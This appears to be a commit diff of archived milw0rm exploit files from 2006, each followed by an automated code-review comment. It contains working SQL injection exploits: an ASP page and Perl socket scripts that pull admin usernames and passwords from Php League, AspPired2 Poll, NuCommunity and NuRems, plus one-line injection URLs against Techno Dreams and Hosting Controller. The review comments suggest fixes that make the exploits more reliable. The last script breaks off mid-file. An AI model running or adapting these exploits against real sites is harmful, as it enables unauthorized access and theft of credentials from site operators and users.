'[Coded by : ajann
'[Author : ajann
'[Contact : :(
'[ExploitName: exploit2.asp
'[Note : exploit file name =>exploit2.asp
'[Note : If Wrong Id = "CTYPE html PUBLIC..... see"
'[Using : Write Target and ID after Submit Click
'===============================================================================================
%>
<html>
<title>Php League v0.82 (classement.php) Remote SQL Injection Exploit</title>
<head>
<script language="JavaScript">
function functionControl1(){
setTimeout("functionControl2()",2000);
}
function functionControl2(){
if(document.form1.field1.value==""){
alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
}
}
function writetext() {
if(document.form1.field1.value==""){
document.getElementById('htmlAlani').innerHTML='<font face=\"Verdana\" size=\"1\" color=\"#008000\">There is a problem... The Data Didn\'t Take </font>'
}
}
function write(){
setTimeout("writetext()",1000);
}
</script>
</head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<body bgcolor="#000000" link="#008000" vlink="#008000" alink="#008000">
<center>
<font face="Verdana" size="2" color="#008000"><b><a href="exploit2.asp">Php League</b>v0.82 (classement.php) <u><b>
Remote SQL Injection Exploit</b></u></a></font><br><br>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
<tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">
<font face="Arial" size="1"><b><font color="#FFFFFF">TARGET:</font>Example:[http://x.com/path]</b></font><p>
<b><font face="Arial" size="1" color="#FFFFFF">USER ID:</font></b><font face="Arial" size="1"><b>Example:[User
ID=1]</b></font></td>
<td width="50%"><center>
<form method="post" name="form1" action="exploit2.asp?islem=get">
<input type="text" name="text1" value="http://" size="25" style="background-color: #808080"><br><input type="text" name="id" value="10" size="25" style="background-color: #808080">
<input type="submit" value="Get"></center></td>
</tr>
</table>
<div id=htmlAlani></div>
<%
islem = Request.QueryString("islem")
If islem = "hata1" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please complete to the whole spaces</font>"
End If
If islem = "hata2" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please right character use</font>"
End If
If islem = "hata3" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Add ""http://""</font>"
End If
%>
<%
If islem = "get" Then
string2="/consult/classement.php?champ='"
string3="%20union%20select%200,0,concat(char(85),char(115),"
string4="char(101),char(114),char(73),char(68),char(58),"
string5="id,char(32),char(65),char(100),char(109)"
string6=",char(105),char(110),char(63),char(58),admin,char(32),char(85),"
string7="char(115),char(101),char(114),char(78),char(97),char(109),"
string8="char(101),char(58),pseudo,char(32),char(80),char(97),char(115),"
string9="char(115),char(58),char(13),char(10),mot_de_passe)"
string10="%20from%20phpl_membres%20where"
string11="%20id%20like%20"
string12=Request.Form("id")
string13="/*"
targettext = Request.Form("text1")
arama=InStr(1, targettext, "union" ,1)
arama2=InStr(1, targettext, "http://" ,1)
If targettext="" Then
Response.Redirect("exploit2.asp?islem=hata1")
Else
If arama>0 then
Response.Redirect("exploit2.asp?islem=hata2")
Else
If arama2=0 then
Response.Redirect("exploit2.asp?islem=hata3")
Else
%>
<%
target1 = targettext+string2+string3+string4+string5+string6+string7+string8+string9+string10+string11+string12+string13
Public Function take(come)
Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )
With objtake
.Open "GET" , come, FALSE
.sEnd
take = .Responsetext
End With
SET objtake = Nothing
End Function
get_username = take(target1)
getdata=InStr(get_username,"0 0/" )
username=Mid(get_username,getdata+5,90)
%>
<center>
<font face="Verdana" size="2" color="#008000"> <u><b>
ajann<br></b></u></font>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
<tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<b><font size="2" face="Arial">Data:</font></b></td>
<td width="80%">
&nbsp;<b><font color="#C0C0C0" size="2" face="Verdana"><%=username%></b></font></p>
</td>
</tr>
</table>
<form method="POST" name="form2" action="#">
<input type="hidden" name="field1" size="20" value="<%=username%>"></p>
</form>
</center>
<script language="JavaScript">
write()
functionControl1()
</script>
</body>
</html>
<%
End If
End If
End If
End If
Set objtake = Nothing
%>
# milw0rm.com [2006-10-27]
<% Response.Buffer = True %>
<% On Error Resume Next %>
<% Server.ScriptTimeout = 100 %>
<%
'===============================================================================================
'[Script Name: Php League v0.82 (classement.php) Remote SQL Injection Exploit
'[Coded by : ajann
'[Author : ajann
'[Contact : :(
'[ExploitName: exploit2.asp
'[Note : exploit file name =>exploit2.asp
'[Note : If Wrong Id = "CTYPE html PUBLIC..... see"
'[Using : Write Target and ID after Submit Click
'===============================================================================================
%>
<html>
<title>Php League v0.82 (classement.php) Remote SQL Injection Exploit</title>
<head>
<script language="JavaScript">
function functionControl1(){
setTimeout("functionControl2()",2000);
}
function functionControl2(){
if(document.form1.field1.value==""){
alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
}
}
function writetext() {
if(document.form1.field1.value==""){
document.getElementById('htmlAlani').innerHTML='<font face=\"Verdana\" size=\"1\" color=\"#008000\">There is a problem... The Data Didn\'t Take </font>'
}
}
function write(){
setTimeout("writetext()",1000);
}
</script>
</head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<body bgcolor="#000000" link="#008000" vlink="#008000" alink="#008000">
<center>
<font face="Verdana" size="2" color="#008000"><b><a href="exploit2.asp">Php League</b>v0.82 (classement.php) <u><b>
Remote SQL Injection Exploit</b></u></a></font><br><br>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
<tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">
<font face="Arial" size="1"><b><font color="#FFFFFF">TARGET:</font>Example:[http://x.com/path]</b></font><p>
<b><font face="Arial" size="1" color="#FFFFFF">USER ID:</font></b><font face="Arial" size="1"><b>Example:[User
ID=1]</b></font></td>
<td width="50%"><center>
<form method="post" name="form1" action="exploit2.asp?islem=get">
<input type="text" name="text1" value="http://" size="25" style="background-color: #808080"><br><input type="text" name="id" value="10" size="25" style="background-color: #808080">
<input type="submit" value="Get"></center></td>
</tr>
</table>
<div id=htmlAlani></div>
<%
islem = Request.QueryString("islem")
If islem = "hata1" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please complete to the whole spaces</font>"
End If
If islem = "hata2" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please right character use</font>"
End If
If islem = "hata3" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Add ""http://""</font>"
End If
%>
<%
If islem = "get" Then
string2="/consult/classement.php?champ='"
string3="%20union%20select%200,0,concat(char(85),char(115),"
string4="char(101),char(114),char(73),char(68),char(58),"
string5="id,char(32),char(65),char(100),char(109)"
string6=",char(105),char(110),char(63),char(58),admin,char(32),char(85),"
string7="char(115),char(101),char(114),char(78),char(97),char(109),"
string8="char(101),char(58),pseudo,char(32),char(80),char(97),char(115),"
string9="char(115),char(58),char(13),char(10),mot_de_passe)"
string10="%20from%20phpl_membres%20where"
string11="%20id%20like%20"
string12=Request.Form("id")
string13="/*"
targettext = Request.Form("text1")
arama=InStr(1, targettext, "union" ,1)
arama2=InStr(1, targettext, "http://" ,1)
If targettext="" Then
Response.Redirect("exploit2.asp?islem=hata1")
Else
If arama>0 then
Response.Redirect("exploit2.asp?islem=hata2")
Else
If arama2=0 then
Response.Redirect("exploit2.asp?islem=hata3")
Else
%>
<%
target1 = targettext+string2+string3+string4+string5+string6+string7+string8+string9+string10+string11+string12+string13
Public Function take(come)
Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )
With objtake
.Open "GET" , come, FALSE
.sEnd
take = .Responsetext
End With
SET objtake = Nothing
End Function
get_username = take(target1)
getdata=InStr(get_username,"0 0/" )
username=Mid(get_username,getdata+5,90)
%>
<center>
<font face="Verdana" size="2" color="#008000"> <u><b>
ajann<br></b></u></font>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
<tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<b><font size="2" face="Arial">Data:</font></b></td>
<td width="80%">
&nbsp;<b><font color="#C0C0C0" size="2" face="Verdana"><%=username%></b></font></p>
</td>
</tr>
</table>
<form method="POST" name="form2" action="#">
<input type="hidden" name="field1" size="20" value="<%=username%>"></p>
</form>
</center>
<script language="JavaScript">
write()
functionControl1()
</script>
</body>
</html>
<%
End If
End If
End If
End If
Set objtake = Nothing
%>
# milw0rm.com [2006-10-27]
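Review bot: the three `Response.Redirect` calls in the `hata1`/`hata2`/`hata3` validation branches (the `If targettext=""` block right after `targettext = Request.Form("text1")`) execute after the page has already written `<html>`, the `<head>` script and the form table, so they only succeed because IIS response buffering is on by default; with buffering off a redirect after headers are sent raises an ASP runtime error. Moving that validation block above the first `<html>` line, or setting `Response.Buffer = True` at the top of the page, would make it independent of server configuration. Two smaller style points: the `<meta http-equiv="Content-Type" ...>` tag sits after `</head>` instead of inside it, and the trailing `Set objtake = Nothing` after the last `End If` is redundant, since `take()` already releases the object before returning.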


@ -1,46 +1,46 @@
Hosting Controller 6.1 Hotfix <= 3.2 Multi Vuln.
SQL_Injection, Command Injection
-------
[KAPDA::59] - Hosting Controller 6.1 Hotfix <= 3.2
Vendor: Hosting Controller
Vendor URL: www.hostingcontroller.com
Solution: Hotfix 3.3
Found Date: 7/1/2006
Release Date: 10/10/2006
Discussion:
--------------------
UnAuthenticated user can
1- delete every sites virtual directory on hc sites
2- make forum virtual directory (with the desire name) for everysites on hc!
3- disable all hc forums by SQL Injection
4- enable all hc forums by SQL Injection
Bugs are available in "DisableForum.asp" and "enableForum.asp" in forum directory.
Exploit: (or POC)
--------------------
1- unAuthenticated user can delete every sites virtual directory on hc sites by forum!
/forum/HCSpecific/DisableForum.asp?action=disableforum&WSiteName=testsite.com&VDirName=test&ForumID=1
-----------------------------------------------------------------
2- unAuthenticated user can make forum virtual directory (with the desire name) for everysites on hc by forum!
/forum/HCSpecific/EnableForum.asp?action=enableforum&WSiteName=testsite.com&VDirName=test&ForumID=
-----------------------------------------------------------------
3- unAuthenticated user can disable all hc forums by SQL_Injection
/forum/HCSpecific/DisableForum.asp?action=disableforum&ForumID=1 or 1=1
-----------------------------------------------------------------
4- unAuthenticated user can enable all hc forums by SQL_Injection
/forum/HCSpecific/EnableForum.asp?action=enableforum&ForumID=1 or 1=1
--------------------
Credit :
--------------------
Soroush Dalili of Kapda and GSG
IRSDL [4t} kapda <d0t] ir
Kapda - Security Science Researchers Insitute [http://www.KAPDA.ir]
GSG - Grayhatz security group [http://www.Grayhatz.net]
# milw0rm.com [2006-10-27]
Hosting Controller 6.1 Hotfix <= 3.2 Multi Vuln.
SQL_Injection, Command Injection
-------
[KAPDA::59] - Hosting Controller 6.1 Hotfix <= 3.2
Vendor: Hosting Controller
Vendor URL: www.hostingcontroller.com
Solution: Hotfix 3.3
Found Date: 7/1/2006
Release Date: 10/10/2006
Discussion:
--------------------
UnAuthenticated user can
1- delete every sites virtual directory on hc sites
2- make forum virtual directory (with the desire name) for everysites on hc!
3- disable all hc forums by SQL Injection
4- enable all hc forums by SQL Injection
Bugs are available in "DisableForum.asp" and "enableForum.asp" in forum directory.
Exploit: (or POC)
--------------------
1- unAuthenticated user can delete every sites virtual directory on hc sites by forum!
/forum/HCSpecific/DisableForum.asp?action=disableforum&WSiteName=testsite.com&VDirName=test&ForumID=1
-----------------------------------------------------------------
2- unAuthenticated user can make forum virtual directory (with the desire name) for everysites on hc by forum!
/forum/HCSpecific/EnableForum.asp?action=enableforum&WSiteName=testsite.com&VDirName=test&ForumID=
-----------------------------------------------------------------
3- unAuthenticated user can disable all hc forums by SQL_Injection
/forum/HCSpecific/DisableForum.asp?action=disableforum&ForumID=1 or 1=1
-----------------------------------------------------------------
4- unAuthenticated user can enable all hc forums by SQL_Injection
/forum/HCSpecific/EnableForum.asp?action=enableforum&ForumID=1 or 1=1
--------------------
Credit :
--------------------
Soroush Dalili of Kapda and GSG
IRSDL [4t} kapda <d0t] ir
Kapda - Security Science Researchers Insitute [http://www.KAPDA.ir]
GSG - Grayhatz security group [http://www.Grayhatz.net]
# milw0rm.com [2006-10-27]
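Review bot: the `SQL_Injection, Command Injection` classification on the second line is not backed by the four PoCs in the Exploit section: items 1 and 2 are missing-authentication issues in `DisableForum.asp` / `EnableForum.asp` (an unauthenticated caller can delete or create a site's virtual directory), and items 3 and 4 are `or 1=1` SQL injections through `ForumID`; nothing in the file shows OS command execution, so `Missing Authentication, SQL Injection` would describe it accurately. Minor: `Insitute` in the KAPDA credit line should read `Institute`, and the old and new sides of this hunk are textually identical, so the change appears to be whitespace or line-ending normalization only and the commit would benefit from saying so.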


@ -1,21 +1,21 @@
*******************************************************************************
# Title : Techno Dreams Announcement (MainAnnounce2.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Script Page: http://www.t-dreams.com
*******************************************************************************
###http://[target]/[path]/MainAnnounce2.asp?key=[ SQL ]
Example:
//MainAnnounce2.asp?key=204%20union%20select%200,UserName,0,Password,0%20from%20admin
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-10-30]
*******************************************************************************
# Title : Techno Dreams Announcement (MainAnnounce2.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Script Page: http://www.t-dreams.com
*******************************************************************************
###http://[target]/[path]/MainAnnounce2.asp?key=[ SQL ]
Example:
//MainAnnounce2.asp?key=204%20union%20select%200,UserName,0,Password,0%20from%20admin
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-10-30]
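Review bot: the entry carries no affected-version, vendor-notification or fix-status fields, unlike the Hosting Controller file in this same commit (`Vendor:`, `Solution:`, `Found Date:`, `Release Date:`), so a reader cannot tell which releases of Techno Dreams Announcement are affected or whether a fixed build exists; adding at least `Version:` and `Solution:` lines (even `Solution: none known`) would make it usable for triage. The example shows `key` takes a numeric value in normal use (`key=204`), so a one-line remediation note (treat `key` as an integer and bind it as a query parameter) would also give defenders something actionable.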


@ -1,21 +1,21 @@
*******************************************************************************
# Title : Techno Dreams Guestbook v1.0 (guestbookview.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Script Page: http://www.t-dreams.com
*******************************************************************************
###http://[target]/[path]/guestbookview.asp?key=[ SQL ]
Example:
//guestbookview.asp?key=7782%20union%20select%200,0,adminname,password,0,0,0%20from%20admin
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-10-30]
*******************************************************************************
# Title : Techno Dreams Guestbook v1.0 (guestbookview.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Script Page: http://www.t-dreams.com
*******************************************************************************
###http://[target]/[path]/guestbookview.asp?key=[ SQL ]
Example:
//guestbookview.asp?key=7782%20union%20select%200,0,adminname,password,0,0,0%20from%20admin
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-10-30]
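Review bot: the example line `//guestbookview.asp?key=...` drops the `http://[target]/[path]/` prefix that the template line directly above it uses, and a leading `//` reads as a protocol-relative URL rather than as a comment marker; writing the example in the same full-URL form as the template would remove the ambiguity. The `# ...` and `# Im not Hacker!` trailer lines are signature filler repeated across this author's files and carry no information about the issue.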


@ -1,87 +1,87 @@
#!/usr/bin/perl
#[Script Name: AspPired2 Poll <= 1.0 (MoreInfo.asp) Remote SQL Injection Exploit
#[Coded by : ajann
#[Author : ajann
#[Contact : :(
use IO::Socket;
if(@ARGV < 3){
print "
[========================================================================
[// AspPired2 Poll <= 1.0 (MoreInfo.asp) Remote SQL Injection Exploit
[// Usage: class.pl [target] [path] [userid]
[// Example: exploit.pl victim.com / 1
[// Example: exploit.pl victim.com /path/ 1
[// Vuln&Exp : ajann
[========================================================================
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
$dir = $ARGV[1];
$file = "MoreInfo.asp?id=";
$target = "-1+union+select+login+from+user+where+no+like%20".$ARGV[2];
$target = $host.$dir.$file.$target;
$targettwo = "-1+union+select+password+from+user+where+no+like%20".$ARGV[2];
$targettwo = $host.$dir.$file.$targettwo;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket>) {
if ($answer =~ /ltext\">(.*?)<\/td>/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Username: $1\n";
print "+**********************************************************************+\n";
print "+ Trying to connect for Password: $server\n";
$socket1 = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket1 "GET $targettwo\n";
print $socket1 "Host: $server\n";
print $socket1 "Accept: */*\n";
print $socket1 "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket1>) {
if ($answer =~ /ltext\">(.*?)<\/td>/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Password: $1\n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /Ad removed or not yet approved/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
}
}
}
print "+ Exploit failed :(\n";
print "+**********************************************************************+\n";
# milw0rm.com [2006-11-09]
#!/usr/bin/perl
#[Script Name: AspPired2 Poll <= 1.0 (MoreInfo.asp) Remote SQL Injection Exploit
#[Coded by : ajann
#[Author : ajann
#[Contact : :(
use IO::Socket;
if(@ARGV < 3){
print "
[========================================================================
[// AspPired2 Poll <= 1.0 (MoreInfo.asp) Remote SQL Injection Exploit
[// Usage: class.pl [target] [path] [userid]
[// Example: exploit.pl victim.com / 1
[// Example: exploit.pl victim.com /path/ 1
[// Vuln&Exp : ajann
[========================================================================
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
$dir = $ARGV[1];
$file = "MoreInfo.asp?id=";
$target = "-1+union+select+login+from+user+where+no+like%20".$ARGV[2];
$target = $host.$dir.$file.$target;
$targettwo = "-1+union+select+password+from+user+where+no+like%20".$ARGV[2];
$targettwo = $host.$dir.$file.$targettwo;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket>) {
if ($answer =~ /ltext\">(.*?)<\/td>/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Username: $1\n";
print "+**********************************************************************+\n";
print "+ Trying to connect for Password: $server\n";
$socket1 = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket1 "GET $targettwo\n";
print $socket1 "Host: $server\n";
print $socket1 "Accept: */*\n";
print $socket1 "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket1>) {
if ($answer =~ /ltext\">(.*?)<\/td>/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Password: $1\n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /Ad removed or not yet approved/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
}
}
}
print "+ Exploit failed :(\n";
print "+**********************************************************************+\n";
# milw0rm.com [2006-11-09]
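Review bot: the failure branch `if ($answer =~ /Ad removed or not yet approved/)` tests for a message from a classified-ads application, not from a poll script, so in AspPired2 Poll that branch can never fire and the script falls through to the generic `Exploit failed` line; either drop it or document which page text it is meant to match. Also: the usage banner names the script `class.pl` while both examples say `exploit.pl`; `$server =~ s/(http:\/\/)//eg;` applies the `/e` flag to an empty replacement, which evaluates nothing and should be a plain `s/^http:\/\///`; and there is no `use strict; use warnings;`, so a misspelled `$targettwo` would go unnoticed.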


@ -1,85 +1,85 @@
#!/usr/bin/perl
#[Script Name: NuCommunity 1.0 (cl_CatListing.asp) Remote SQL Injection Exploit
#[Coded by : ajann
#[Author : ajann
#[Contact : :(
use IO::Socket;
if(@ARGV < 3){
print "
[========================================================================
[// NuCommunity 1.0 (cl_CatListing.asp) Remote SQL Injection Exploit
[// Usage: exploit.pl [target] [path] [userid]
[// Example: exploit.pl victim.com / 1
[// Example: exploit.pl victim.com /path/ 1
[// Vuln&Exp : ajann
[========================================================================
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
$dir = $ARGV[1];
$file = "cl_CatListing.asp?cl_cat_ID=";
$target = "-1%20union%20select%200,0,0,admin_user%20from%20admin+where+admin_id%20like%20".$ARGV[2];
$target = $host.$dir.$file.$target;
$targettwo = "-1%20union%20select%200,0,0,admin_password%20from%20admin+where+admin_id%20like%20".$ARGV[2];
$targettwo = $host.$dir.$file.$targettwo;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket>) {
if ($answer =~ /t size=\"2\">(.*?)<\/font>/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Username: $1\n";
print "+**********************************************************************+\n";
print "+ Trying to connect for Password: $server\n";
$socket1 = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket1 "GET $targettwo\n";
print $socket1 "Host: $server\n";
print $socket1 "Accept: */*\n";
print $socket1 "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket1>) {
if ($answer =~ /t size=\"2\">(.*?)<\/font>/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Password: $1\n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /Ad removed or not yet approved/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
}
}
}
print "+ Exploit failed :(\n";
print "+**********************************************************************+\n";
# milw0rm.com [2006-11-11]
#!/usr/bin/perl
#[Script Name: NuCommunity 1.0 (cl_CatListing.asp) Remote SQL Injection Exploit
#[Coded by : ajann
#[Author : ajann
#[Contact : :(
use IO::Socket;
if(@ARGV < 3){
print "
[========================================================================
[// NuCommunity 1.0 (cl_CatListing.asp) Remote SQL Injection Exploit
[// Usage: exploit.pl [target] [path] [userid]
[// Example: exploit.pl victim.com / 1
[// Example: exploit.pl victim.com /path/ 1
[// Vuln&Exp : ajann
[========================================================================
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
$dir = $ARGV[1];
$file = "cl_CatListing.asp?cl_cat_ID=";
$target = "-1%20union%20select%200,0,0,admin_user%20from%20admin+where+admin_id%20like%20".$ARGV[2];
$target = $host.$dir.$file.$target;
$targettwo = "-1%20union%20select%200,0,0,admin_password%20from%20admin+where+admin_id%20like%20".$ARGV[2];
$targettwo = $host.$dir.$file.$targettwo;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket>) {
if ($answer =~ /t size=\"2\">(.*?)<\/font>/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Username: $1\n";
print "+**********************************************************************+\n";
print "+ Trying to connect for Password: $server\n";
$socket1 = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket1 "GET $targettwo\n";
print $socket1 "Host: $server\n";
print $socket1 "Accept: */*\n";
print $socket1 "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket1>) {
if ($answer =~ /t size=\"2\">(.*?)<\/font>/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Password: $1\n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /Ad removed or not yet approved/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
}
}
}
print "+ Exploit failed :(\n";
print "+**********************************************************************+\n";
# milw0rm.com [2006-11-11]
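Review bot: the success check `if ($answer =~ /t size=\"2\">(.*?)<\/font>/)` matches the first `<font size="2">` element on any line of the response, which in a category-listing page is as likely to be static template text as the injected column, so `Exploit succeed!` can be printed with page boilerplate in the Username or Password slot; the script should document which page element the pattern is meant to capture, and a comment noting the false-positive risk is the minimum. `$socket` is also never closed before `$socket1` is opened, and the old and new sides of this hunk are identical, pointing to a line-ending-only change.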


@ -1,73 +1,73 @@
#!/usr/bin/perl
#[Script Name: NuRems 1.0 (propertysdetails.asp) Remote SQL Injection Exploit
#[Coded by : ajann
#[Author : ajann
#[Contact : :(
use IO::Socket;
if(@ARGV < 3){
print "
[========================================================================
[// NuRems 1.0 (propertysdetails.asp) Remote SQL Injection Exploit
[// Usage: class.pl [target] [path] [userid]
[// Example: exploit.pl victim.com / 1
[// Example: exploit.pl victim.com /path/ 1
[// Vuln&Exp : ajann
[========================================================================
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
$dir = $ARGV[1];
$file = "propertysdetails.asp?PropID=";
$target = "16%20union%20select%200,Username,password,Email,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20agents%20where%20AgentID%20like%20".$ARGV[2];
$target = $host.$dir.$file.$target;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket>) {
if ($answer =~ /Location:(.*?)<\/font>/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Username: $1\n";
}
if ($answer =~ /Address:(.*?)<\/font>/){
print "+ Password: $1\n";
}
if ($answer =~ /# Rooms:(.*?)<\/font>/){
print "+ Email: $1\n";
exit();
}
if ($answer =~ /Ad removed or not yet approved/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
}
print "+ Exploit failed :(\n";
print "+**********************************************************************+\n";
# milw0rm.com [2006-11-11]
#!/usr/bin/perl
#[Script Name: NuRems 1.0 (propertysdetails.asp) Remote SQL Injection Exploit
#[Coded by : ajann
#[Author : ajann
#[Contact : :(
use IO::Socket;
if(@ARGV < 3){
print "
[========================================================================
[// NuRems 1.0 (propertysdetails.asp) Remote SQL Injection Exploit
[// Usage: class.pl [target] [path] [userid]
[// Example: exploit.pl victim.com / 1
[// Example: exploit.pl victim.com /path/ 1
[// Vuln&Exp : ajann
[========================================================================
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
$dir = $ARGV[1];
$file = "propertysdetails.asp?PropID=";
$target = "16%20union%20select%200,Username,password,Email,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20agents%20where%20AgentID%20like%20".$ARGV[2];
$target = $host.$dir.$file.$target;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
